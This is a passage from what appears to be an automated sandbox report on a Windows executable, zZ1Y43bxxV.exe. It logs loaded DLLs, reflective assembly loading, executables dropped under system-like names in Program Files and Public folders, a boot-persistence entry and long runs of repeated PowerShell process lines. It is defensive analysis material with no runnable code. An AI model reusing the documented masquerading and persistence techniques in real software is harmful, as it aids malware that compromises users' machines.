                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                          Source: Window Recorder | Window detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe | Directory created: C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe | Directory created: C:\Program Files\Internet Explorer\a903aeb2e41cb9
                          Source: zZ1Y43bxxV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: zZ1Y43bxxV.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                          Source: zZ1Y43bxxV.exe | Static file information: File size 2615296 > 1048576
                          Source: zZ1Y43bxxV.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x27e000
                          Source: zZ1Y43bxxV.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.logat source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2901730818.0000000000F96000.00000004.00000020.00020000.00000000.sdmp

                          Data Obfuscation

                          Source: zZ1Y43bxxV.exe, 1a2.cs | .Net Code: ghM System.Reflection.Assembly.Load(byte[])
                          Source: zZ1Y43bxxV.exe, 857.cs | .Net Code: _736

                          Persistence and Installation Behavior

                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe | File written: C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exeJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exeJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\CqMurJJc.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\HQmkzWIi.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\xuLckdTj.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\bfAYobhs.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\voDmexRC.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\IaGAqGnL.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exeJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\wGHUzQXl.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\LGcbGTIb.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\YoKhhehz.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeFile created: C:\Users\user\Desktop\JKpAqWmX.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\Public\UserOOBEBroker.exeJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile created: C:\Users\user\Desktop\jeYWdqhF.logJump to dropped file
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File created: C:\Users\user\Desktop\BtlmWJui.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File created: C:\Users\user\Desktop\TxdZLwor.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File created: C:\Users\user\Desktop\CidbNaiX.log
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File created: C:\Users\user\Desktop\EBWcxehU.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File created: C:\Users\user\Desktop\iOGyhUTj.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File created: C:\Users\user\Desktop\ASylWHNt.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File created: C:\Users\user\Desktop\rpqvmOyM.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File created: C:\Users\user\Desktop\oyzEfRxS.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File created: C:\Users\user\Desktop\XriZMeSE.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File created: C:\Users\user\Desktop\RrWiEPnK.log
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe File created: C:\Users\user\Desktop\zeucltSv.log

                          Boot Survival

                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe File created: C:\Users\Public\UserOOBEBroker.exe

                          Hooking and other Techniques for Hiding and Protection

                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
